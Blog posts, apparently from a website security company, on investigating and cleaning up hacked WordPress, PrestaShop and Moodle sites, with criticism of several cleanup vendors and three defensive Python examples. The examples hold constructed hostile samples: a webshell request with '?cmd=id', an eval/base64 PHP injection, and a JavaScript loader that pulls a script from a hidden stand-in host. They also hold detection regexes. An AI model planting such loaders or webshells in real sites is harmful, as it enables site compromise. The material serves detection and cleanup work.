The Location of Malware on a Website Probably Won’t Show Source of the Hack

It isn’t uncommon to see people claim that a particular piece of software is the cause of their website being hacked based solely on malicious code having been found in one of that software’s files. In reality, the files a hacker modifies usually have no connection to how they got in. Once a hacker has the ability to modify existing files, they can usually change any file on the website. Sometimes they modify every file of a certain type, sometimes they modify files at random, and they may also add new files in random locations. A modified plugin file shows that the plugin’s directory was writable with whatever access the hacker had, not that the plugin was the way in.

There is one major exception to this. If a hacker gained access to the website through a vulnerability that allows uploading files to a specific location, then finding malicious files in that location is a strong indication that the vulnerability was the entry point. Even then, only the files in that location tell you anything; whatever the hacker went on to change elsewhere does not.

While the location of malicious code likely doesn’t tell you how the website was hacked, log files can go a long way toward telling you that. That depends on there being logging for the method of access the hacker used and on that logging still being available for the time when the website was hacked. If a hacker got in through FTP access, but you don’t have a log of that, then you are out of luck. If the hacker originally got in months ago, but the hack was only spotted recently, there is a good chance that the logging is no longer available. Before relying on logs, check which ones actually exist (web server access logs, FTP/SFTP, control panel and SSH logs) and how long each is kept, and preserve copies before they rotate away.

Even if you have logging available that would show the source of the hack, you need to be able to pick that out of the logging data. That is where having someone who deals with doing that on a regular basis will produce better results than trying to review the logging yourself.
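To show what picking the source out of the logging data looks like in practice, here is an added example (not code from the original post). It starts from a path that now holds malicious code, finds the first request that touched it in a web server access log, and lists what the same client did beforehand, which is usually where the entry point shows up. It assumes the Apache/nginx “combined” log format; the log lines, IP addresses, the webshell path and the plugin name “example-plugin” are all constructed for the example.

```python
"""Access-log triage for a hacked website (added example, not from the original post)."""
import re
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["path"], _, e["query"] = e["path"].partition("?")  # match on the path, keep the query
    return e


def triage(lines, malicious_path):
    """Return the first request for malicious_path, every earlier request from the same
    client, and the subset of those that could have written the file (2xx POST/PUT)."""
    entries = [e for e in map(parse_line, lines) if e is not None]
    entries.sort(key=lambda e: e["ts"])  # rotated logs are often concatenated out of order
    first = next((e for e in entries if e["path"] == malicious_path), None)
    if first is None:
        return None
    prior = [e for e in entries if e["ip"] == first["ip"] and e["ts"] < first["ts"]]
    writes = [e for e in prior if e["method"] in ("POST", "PUT") and 200 <= e["status"] < 300]
    return {"first_hit": first, "prior_from_same_client": prior, "likely_writes": writes}


# Constructed sample log: documentation-range IPs, a hypothetical plugin and webshell path.
SAMPLE_LOG = [
    # a line from a second, later log file that was concatenated out of order
    '192.0.2.55 - - [10/Nov/2023:11:20:33 +0000] "GET /wp-content/uploads/2023/11/x.php HTTP/1.1" 200 88 "-" "curl/8.0.1"',
    '198.51.100.20 - - [10/Nov/2023:09:58:41 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2023:10:00:01 +0000] "GET /wp-content/plugins/example-plugin/readme.txt HTTP/1.1" 200 740 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [10/Nov/2023:10:00:05 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 312 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [10/Nov/2023:10:00:09 +0000] "GET /wp-content/uploads/2023/11/x.php?cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.31.0"',
    '198.51.100.20 - - [10/Nov/2023:10:03:12 +0000] "GET /about/ HTTP/1.1" 200 4800 "-" "Mozilla/5.0"',
    "this line is truncated and will be skipped",
]
WEBSHELL = "/wp-content/uploads/2023/11/x.php"  # hypothetical path where malware was found

if __name__ == "__main__":
    result = triage(SAMPLE_LOG, WEBSHELL)
    hit = result["first_hit"]
    print(f"first request for {WEBSHELL}: {hit['ts']} from {hit['ip']}")
    for e in result["prior_from_same_client"]:
        print(f"  earlier from same client: {e['ts']} {e['method']} {e['path']} -> {e['status']}")
    for e in result["likely_writes"]:
        print(f"  possible upload: {e['method']} {e['path']}")
```

In the constructed log the first request for the webshell comes from 203.0.113.7, and the same client’s earlier POST to the plugin’s upload endpoint is the candidate entry point to investigate. The scanner that hit the file later from another address is noise, and the malformed line is skipped rather than aborting the run. Real cases add more noise (shared IPs, proxies, months of data), which is exactly why the review takes experience.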

Why Your Website is Broken or Down After Having Automated Malware Removal Done

It isn’t uncommon to see people complaining about their websites being broken or down after having a malware removal service deal with malware that had been on the website. If the website wasn’t having that problem before the malware was removed, the cause is likely that automated malware removal was used without careful supervision to make sure that all of the added code was removed while none of the preexisting code was.

To give an example of how things get messed up, take a website we saw after automated malware removal was done. At the top of the website’s pages was the text “?>”. For those not familiar with PHP coding, that is the end tag for a block of PHP code; when it appears outside of a PHP block, the server sends it to the browser as literal text, which is why it showed up on the pages. What probably happened is that code had been added to the beginning of a file that looked like this (with “malicious code” standing in for the actual malicious code):

<?php “malicious code” ?>

The automated malware removal then removed ‘<?php “malicious code”‘, but left the closing “?>” behind.

Depending on what has been damaged, fixing this can be relatively easy or rather hard.

Before making any more changes, make sure to back up anything that is going to be changed. Worst case, you can revert to where you started before trying to deal with this.
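As an added example of doing this carefully (not code from the original post or from any removal service named on this page), the following removes a block prepended to the start of a PHP file only when a signature says the block is malicious, so preexisting code at the top of a file is left alone; it also detects and repairs files that an earlier partial removal left starting with a bare “?>”, and it writes a backup before touching a file. The signature, the sample files and the payload string are constructed for the example; a real cleanup matches against the code actually found on the site.

```python
"""Removing a prepended PHP block without leaving "?>" behind (added example)."""
import re
import shutil
from pathlib import Path

# A block at the very start of the file, up to the first "?>" and its trailing newline.
PREPENDED_BLOCK = re.compile(r"\A<\?php\b.*?\?>[ \t]*\r?\n?", re.DOTALL)
# A file that now begins with a bare "?>": the tell-tale of a half-removed block.
STRAY_CLOSE_TAG = re.compile(r"\A\s*\?>[ \t]*\r?\n?")
# Constructed signature for the example; real cleanups match the actual code found.
KNOWN_BAD = re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def looks_malicious(block):
    return KNOWN_BAD.search(block) is not None


def strip_prepended_block(content, is_malicious=looks_malicious):
    """Return (new_content, removed_block); removed_block is None when nothing was removed.
    The whole block, including its closing tag and newline, goes together."""
    m = PREPENDED_BLOCK.match(content)
    if m is None or not is_malicious(m.group(0)):
        return content, None
    return content[m.end():], m.group(0)


def has_stray_close_tag(content):
    return STRAY_CLOSE_TAG.match(content) is not None


def repair_stray_close_tag(content):
    """Drop a leading bare "?>" left by a partial removal; everything else is kept."""
    return STRAY_CLOSE_TAG.sub("", content, count=1)


def clean_file(path, is_malicious=looks_malicious):
    """Back up the file, then rewrite it only if a block was removed or a stray tag repaired."""
    path = Path(path)
    original = path.read_text(encoding="utf-8", errors="surrogateescape")
    new, removed = strip_prepended_block(original, is_malicious)
    if removed is None and has_stray_close_tag(new):
        new = repair_stray_close_tag(new)
    if new == original:
        return False
    shutil.copy2(path, path.with_name(path.name + ".bak"))  # backup before any change
    path.write_text(new, encoding="utf-8", errors="surrogateescape")
    return True


# Constructed inputs. "Li4u" decodes to "...", a stand-in for a real payload.
INJECTED = '<?php eval(base64_decode("Li4u")); ?>\n'
ORIGINAL = "<?php\n/**\n * Plugin Name: Example Plugin\n */\nfunction example_init() {\n    return true;\n}\n"
LEGIT_TEMPLATE = '<?php get_header(); ?>\n<div class="content"></div>\n'
BOTCHED = "?>\n" + ORIGINAL  # what a partial removal of INJECTED leaves behind

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        p = Path(d) / "plugin.php"
        p.write_text(INJECTED + ORIGINAL, encoding="utf-8")
        print("changed:", clean_file(p), "backup exists:", p.with_name("plugin.php.bak").exists())
        print("restored original:", p.read_text(encoding="utf-8") == ORIGINAL)
```

The template file that legitimately starts with a short “<?php ... ?>” block is left untouched because the predicate, not the shape of the block, decides what is removed. That is the supervision step an unattended tool skips.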

Whoever did the malware removal really should address this, but if this is an obvious issue across the website, they clearly are not too concerned about the quality of their work, so you may not want them making more changes.

If you don’t feel comfortable handling this yourself, a good web developer should be able to address this for you.

SiteLock and Their Partners Including Bluehost and HostGator are Still Producing Bad Results

Earlier this week, we interacted with someone dealing with the mess that is having SiteLock brought in to clean up a malware infected website. They are not alone in that. Here was a review of them left on Trustpilot in October:

This is a company with no service and it’s a scam! It has been six weeks since I purchased their service and my site is down for the third time during their ‘monitoring’. I just keep receiving generic/automated emails about the removal of threats every two days or so while my website is still down!
I purchased it through Blue Host. I am puzzled as to why BH is recommending Site Lock. Service on both sides is mediocre or nonexistent. BH agents who barely spoke English were arguing with me with raised voices that I needed to be patient and wait until they had time to fix the website! I don’t want to use and be associated with either one of them! Site Lock is a scam and BH is not taking responsibility for recommending it. Thoroughly frustrated.

The person we were interacting with also is a customer of Bluehost. That reviewer wondered why they recommend SiteLock. The answer is pretty simple. Bluehost gets paid by SiteLock if they are hired.

It isn’t just Bluehost. Here was another review from October:

I was called up by “hostgator security” stating that my site had Malware. I asked them to revert it to a backup, and they said it would be $50 and no guarantee of fixing the malware, but I should use “Site Lock” instead. With 2 domains it would be $500, they would remediate the malware immediately, and then provide 12 months of monitoring service. Normally, I’d just handle malware myself, but I’ve got a lot going on, so I decide to let these professionals handle it. I ask them what happens if my site goes down during this process, and they assure me that would not happen because the only files that would be removed is malware. I ask, ok, what if some kind of accident happens and it goes down anyway? “They will help you, they are on top of it.” Okay great. I pay the money, for the next 24 hours I get a dozen emails about site scans happening. I check the next day, and both of my websites will not load. I call the Site Lock number and they tell me there are 19 directories for which I have not paid for Sitelock, and he thinks the malware is hiding there, and I need to pay for service for each of those directories. 19 + 2 X $250 is $5,250, which is as silly, ridiculous, half-baked and outrageous a number as is the premise that more site scans will fix the problem. I come to find out Hostgator and sitelock are two separate companies. This is not a professional team that works together to remediate malware, in my opinion. I call back the hostgator rep who sold me the services, which at least I’m grateful he was easy to get a hold of, and I’m told he will open a ticket which may take up to 24 hours to get a response to. These are active business websites with advertising running to them. I should not have trusted Hostgator, and I should not have trusted Sitelock. After this is all over, I’m going to look at hosts who don’t charge to revert backups.

There were plenty of other recent Trustpilot reviews that are similar. This isn’t really news to us, since we used to have a lot of interactions with people who had hired them to deal with hacked websites, or whose web host was pushing them to, where the same issues came up.

We don’t have good advice to give to those who have already hired SiteLock. But for those that haven’t, the best advice is to avoid them.

If someone else has good advice for those who have hired them and are experiencing problems, leave a comment below.

It Shouldn’t Take SiteLock Days to Remove Malware From a Hacked WordPress Website

In dealing with hacked websites, a company that used to come up a lot in conversations with clients was SiteLock. There have been many problems we have run across with them in past years. We were contacted this week by someone dealing with them after malware was detected on their website by Bluehost. Bluehost gets paid by SiteLock if you hire SiteLock to clean up the website, which is why they promote hiring them to clean it up. It isn’t because SiteLock does a good job of it.

That was on display with what this person was dealing with this week. They were now on the fifth day of SiteLock working on removing the malware from their hacked WordPress website (or at least SiteLock was supposed to be working on it). It shouldn’t take that long. Cleaning up a hacked WordPress website usually takes a few hours. That is how long it takes when we do a proper cleanup, and since lots of providers, including SiteLock in our past experience, don’t do a proper cleanup, it should take them even less time than that.

We don’t have good advice to give to those who have already hired SiteLock. But for those that haven’t, the best advice is to avoid them.

If someone else has good advice for those who have hired them and are experiencing problems, leave a comment below.

Upgrading PrestaShop 1.6 Probably Isn’t the Right Response if Your Website Starts Having a Problem

A recurring issue we have run into is that people contact us looking to have software on their website upgraded because a problem with the website has started occurring. They fail to mention that at all, leading to them complaining that the problem hasn’t been fixed after the upgrade. It happens so much that we now note in the description of our upgrade services that upgrading probably won’t solve a problem they are having, but that we can address the problem while doing the upgrade. We also specifically ask if they are having any issues with the website, in case they miss that note, so we can avoid having unhappy customers.

We recently had an example of that sort of situation that deserves special note, because it could lead to serious problems. We had someone contact us looking for an upgrade of PrestaShop, where they were currently using the last version of PrestaShop 1.6. Upgrading any further means upgrading to PrestaShop 1.7.

Going from PrestaShop 1.6 to 1.7 sounds like a minor version bump, but it is actually a major upgrade. Existing themes and modules won’t work with the new version. So someone doing that upgrade to try to fix a problem is likely going to have new headaches to deal with in addition to the still unresolved problem.

PrestaShop doesn’t suddenly change how it works on its own. So if something starts going wrong, something else has changed. If server-level software changed (the PHP version, for example), that could cause problems with PrestaShop that an upgrade could resolve. But other changes will not be resolved that way. For example, a hack won’t be resolved by upgrading, and trying to upgrade while there is malicious code on the website could actually cause even more problems, since the malicious code can be carried over into the upgraded website or interfere with the upgrade itself.

If you don’t know what is going wrong with your PrestaShop website, it is best to find help fixing the problem instead of guessing at a fix, like doing an upgrade, and hiring someone to do that. If you do need PrestaShop support, we are there to help.

Moodle Doesn’t Yet Actually Require MySQL 8.0

We were recently working on an upgrade of a Moodle website to version 4.3, which originally started as an upgrade to Moodle 4.2. We ran into an issue because those versions require those using the MySQL database server to be on at least version 8.0, up from the previous requirement of at least version 5.7. The web host for the website hadn’t yet moved to that version, so we were at an apparent impasse.

Checking further into this, we found that, while the required MySQL version was raised in Moodle 4.2, that version doesn’t appear to actually be required. The discussion on raising the required version can be found here. The change wasn’t made because of usage of new features of MySQL 8.0, but because support for MySQL 5.7 was going to be ending soon.

In line with that, there were no problems with the website after upgrading to Moodle 4.2 or 4.3 caused by the use of the older version of MySQL.

Getting through Moodle’s pre-upgrade environment check did require manually changing the required version of MySQL in the file /admin/environment.xml. Two caveats apply. That file is part of the Moodle code and is replaced by each upgrade, so the change has to be reapplied for every subsequent upgrade until the web host moves to MySQL 8.0. And the reason the requirement was raised still stands: MySQL 5.7 reached the end of its support from Oracle in October 2023 and no longer receives security fixes, so continuing to run it should be treated as a stopgap while pushing the web host to move off of it.

Wordfence Security Daily Malware Scans Are Not the Way to Clean Up a Malware Infection of a WordPress Website

If your WordPress website has been hacked and contains malware, a common suggestion for cleaning it up is to use the Wordfence Security plugin. There are a number of problems with that. One being that it won’t necessarily catch all the malware, as someone looking for help with the plugin recently noted:

Hello, I’m using the free version and I’m doing daily scans because my site has a malware. At some point the scan did not detect some new folders that have been created in the root folder.

The folders have random characters as a name and contain an index file and a cache folder.

The larger problem with what they were bringing up there is that if the malware had actually been cleaned up, there wouldn’t be new malware to detect day after day. So something has gone wrong there.

If there is malware on a WordPress website, the focus shouldn’t be on removing the malware, though it does need to be removed. It should be on how it got there, which is something that Wordfence Security can’t determine. When the plugin removes the files without that being determined, it makes it harder to figure out.

Another important reason for trying to figure out how the website was infected, which we have seen over and over in years of being brought in to re-clean hacked WordPress websites, is that in doing the work to figure out how the website was hacked, you often find malware or other malicious code that otherwise would have been missed.

Figuring out how the malware got there in the first place, or at least stopping it from getting back in, is a basic part of a proper hack cleanup, but it is something that many security providers, including the developer of Wordfence Security, either don’t attempt or fail to accomplish.

Wordfence Care Failed to Resolve Reoccurring Malware Issue on WordPress Website

When it comes to cleaning up hacked WordPress websites, the most important part of doing that is often not done. That being trying to figure out how the website was hacked and fixing that. Sometimes you can get away with failing to do that, other times the problem is going to come back again and again.

As an example of that, take someone who was looking for help with a hacked WordPress website recently from the developer of the Wordfence Security plugin. They wrote that they had done the following:

Steps I have taken so far:

  1. Scanned my website using a security plugin, but the malware continues to reappear.
  2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
  3. Checked theme files for suspicious code and removed any identified malicious snippets.
  4. Updated WordPress, themes, and plugins to their latest versions.
  5. Changed all passwords related to my website, including admin, FTP, and database.

But that hadn’t resolved the issue:

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection.

They rightly understood the need to figure out the source of the infection, which is notably something that many malware cleanup services for WordPress websites don’t do. We know that because we are often brought in to re-clean hacked WordPress websites where that wasn’t done before, and doing it shows that, in addition to not finding the source of the infection, the previous provider missed parts of the malware still on the website.

The response from the developer didn’t provide helpful information, but it did promote hiring them to clean up the website. According to the poster, they tried that, getting the Wordfence Care service, but it didn’t help:

I already got the Wordfence Care, but you still can’t give the permanent solution for me.

The results from the more expensive Wordfence Response don’t appear to be better.

WordPress Security Plugins Won’t Fully Disinfect a Hacked WordPress Website

When it comes to cleaning up hacked WordPress websites, there is a lot of advice suggesting solutions that are easy, but don’t properly address the situation. That leads to continuing issues that could have been addressed quickly if handled by a professional like us.

As an example of what not to do, take a recent post from the WordPress Support Forum, where someone claimed to have done a full disinfection of a website, which hadn’t worked:

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

One thing missing there is trying to figure out how the website was hacked. That is important for multiple reasons. One of them is that if you don’t know how the website was hacked, then you can’t be sure the issue has been addressed and won’t happen again. Another is that if you don’t know how the website was hacked, then you also likely don’t know when it was hacked. Restoring a backup won’t clear out malicious code if the malicious code is in the backup as well.

Another issue is that they were trying to find malicious code using several WordPress security plugins, none of which found it:

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S[ecurity], All-In-One Security (AIOS), and Anti-Malware Security and Brute-Force Firewall. None have detected it.

While they claim the code was invisible, their description of it tells a different story:

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

During a proper cleanup, theme files would be checked, and even before starting on a hack cleanup, a professional should have noticed that the code was being loaded on the website (even if the external code it in turn loaded only appeared some of the time). A professional would have been looking for that before starting, as people often think that some other issue with a website is a hack, so they want to confirm that a hack cleanup is actually needed before beginning.

Automated malware detection doesn’t work well on its own, as it both fails to detect plenty of malicious code (as occurred here) and flags legitimate code as malicious.
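As an added example of the kind of targeted check a person reviewing the theme would run (not code from the original post or from any plugin named on this page), the following looks through JavaScript for URLs pointing at hosts outside a site-specific allowlist, including URLs hidden inside base64 strings, which is a common way an injected loader disguises its external link, and reports whether the file also contains something that makes a request. The allowlist, the host names and both sample scripts are constructed for the example; the check is a review aid, not a substitute for reading the theme’s files.

```python
"""Finding theme JavaScript that calls out to an outside host (added example)."""
import base64
import re
from pathlib import Path
from urllib.parse import urlparse

# Hosts this site legitimately talks to (constructed; fill in from the real site).
ALLOWED_HOSTS = {"example.com", "www.example.com", "cdn.example.com"}

URL_RE = re.compile(r"https?://[^\s'\"`)]+")
# Quoted string literals long enough to hold a URL that consist only of base64 characters.
B64_STRING_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
# Ways a script fetches something: fetch(), XMLHttpRequest, jQuery helpers, or a script/img src.
REQUEST_RE = re.compile(
    r"fetch\s*\(|new\s+XMLHttpRequest|\.open\s*\(|\$\.(get|post|ajax)\s*\(|\.src\s*="
)


def decode_b64_strings(text):
    """Decoded form of every base64-looking string literal that decodes to valid UTF-8."""
    out = []
    for m in B64_STRING_RE.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # not really base64, or binary data
            continue
    return out


def external_hosts(text):
    """Hosts referenced by plain or base64-hidden URLs that are not on the allowlist."""
    hosts = set()
    for chunk in [text] + decode_b64_strings(text):
        for url in URL_RE.findall(chunk):
            host = urlparse(url).hostname
            if host and host.lower() not in ALLOWED_HOSTS:
                hosts.add(host.lower())
    return hosts


def scan_js(text):
    """Finding for one script: external hosts seen, whether it makes requests, and a verdict."""
    hosts = sorted(external_hosts(text))
    makes_request = REQUEST_RE.search(text) is not None
    return {"external_hosts": hosts, "makes_request": makes_request,
            "suspicious": bool(hosts) and makes_request}


def scan_theme(root):
    """Scan every .js file under a theme directory; returns {relative path: finding} for hits."""
    root = Path(root)
    findings = {}
    for js in root.rglob("*.js"):
        result = scan_js(js.read_text(encoding="utf-8", errors="replace"))
        if result["suspicious"]:
            findings[str(js.relative_to(root))] = result
    return findings


# Constructed: an injected loader that only fires on some page loads and hides its URL in base64.
INJECTED_JS = ('(function(){var u=atob("aHR0cHM6Ly9jZG4uZXhhbXBsZS5uZXQvYS5qcw==");'
               'if(Math.random()<0.3){var s=document.createElement("script");s.src=u;'
               'document.head.appendChild(s);}})();\n')
# Constructed: the theme's own, legitimate request to the site's REST API.
LEGIT_JS = ('jQuery(function($){$.get("https://www.example.com/wp-json/wp/v2/posts",'
            'function(d){console.log(d.length);});});\n')

if __name__ == "__main__":
    for name, js in (("injected", INJECTED_JS), ("legit", LEGIT_JS)):
        print(name, scan_js(js))
```

The injected sample is flagged even though it contains no literal URL, because the base64 string decodes to one pointing at a host the site has no business loading scripts from, while the theme’s own request to the site’s REST API is not. The random-chance condition is why the poster only saw the loaded code on some page views; the loader itself is in the file on every view, which is where a reviewer should look.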

MalCare Customer Indirectly Warns It Fails to Protect Websites From Being Hacked

We recently received a strange request. Someone was asking us for a refund for a hack cleanup plan. We don’t have any such plans; we provide one-time cleanups, and we only charge after the hack cleanup is completed. It turned out that the person had somehow run across a two-year-old post of ours warning about a provider named MalCare, titled MalCare Review: It’s Obvious They Are Taking Advantage of Their Customers, and then contacted us as if we were MalCare.

The request for a refund mentioned things that were in line with what we were warning about two years ago. They wrote, in part:

 Your plan was not working out as planned. I am still cleaning up a lot of damage since my site was hacked, I had to resort to a different plan.

And this:

Looking at the backup you had on your site, the database was filled with numerous users, of which I did not know. I had to clean up my database manually.

After dealing with that, we were curious whether other customers of theirs have been complaining about the service recently. What we saw was that people are still being misled into believing that the service offers things it doesn’t, while another customer, one not criticizing the service, inadvertently refuted that.

Here is part of one recent customer review:

Definitely a game-changer for our websites. Full removal of hacks and complete protection from current and future attempts.

The customer evidently doesn’t know that it won’t actually offer complete protection from future hacking attempts. No service can do that, and from everything we have seen, MalCare doesn’t even do a good job of the protection it could possibly offer. Don’t take our word for that. Here is part of another recent positive customer review:

MalCare and the team behind it have gone above and beyond their stated service to help me restore my website from malicious hacks of my WordPress website. On more than one occasion they were able to scan and clean my site of infected files. Anyone who has a website knows how horrible it feels to learn that your site has been hacked.

Based on that, their website has been hacked at least once while using MalCare’s service. If that weren’t the case, MalCare wouldn’t have been cleaning it up multiple times, unless they failed to properly clean it up the first time.